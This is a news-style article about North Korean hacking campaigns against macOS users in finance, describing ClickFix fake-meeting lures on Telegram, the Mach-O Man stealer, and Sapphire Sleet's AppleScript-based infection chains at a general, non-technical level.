North Korean cyber attackers have intensified their focus on macOS users, employing advanced social engineering tactics. These recent assaults, which aim at individuals in financial sectors, highlight the hackers’ evolving strategies to bypass security measures and steal sensitive information.
Exploiting macOS Through Social Engineering
According to recent findings by Any.Run, a notorious method known as ClickFix has been integral to these attacks. This technique involves deceiving macOS users into installing malware designed to siphon off valuable data. The attackers, posing as trusted contacts on Telegram, send fake meeting invitations to business executives, urging them to resolve fabricated connectivity issues by executing specific commands in the Terminal.
This deception results in the execution of Go-based Mach-O binaries. These binaries are part of a comprehensive malware suite, coined Mach-O Man, that harvests user credentials, Keychain secrets, and browser session data, subsequently transmitting them via Telegram.
AppleScript and State-Sponsored Hacking
Another campaign, linked to the state-sponsored group Sapphire Sleet, is leveraging AppleScript for executing code and evading detection. This group, active since at least 2020 as identified by Microsoft, has similarly been focusing on extracting sensitive information from its targets.
In these attacks, the hackers impersonate recruiters on professional networks to initiate contact with victims. They then invite these individuals to fictitious technical interviews, during which they are tricked into installing malicious software disguised as legitimate video conferencing tools or software updates.
Complex Attack Chains and Data Exfiltration
The Sapphire Sleet campaign diverges from the ClickFix approach by automating the execution of malicious commands. The downloaded file, crafted as an AppleScript, opens within macOS’s Script Editor, executing embedded shell commands without user intervention.
This sophisticated infection chain involves multiple AppleScript payloads, ultimately deploying several backdoors. The attacks are designed to secure persistence and escalate privileges. These payloads perform extensive system reconnaissance, collecting data from applications, Telegram, browser profiles, Keychain, cryptocurrency wallets, and more.
These ongoing campaigns underscore the persistent threat posed by North Korean hackers, as they continue to refine their techniques to compromise high-value targets. With their ability to adapt and employ multiple attack vectors, these hackers remain a significant concern for cybersecurity experts worldwide.
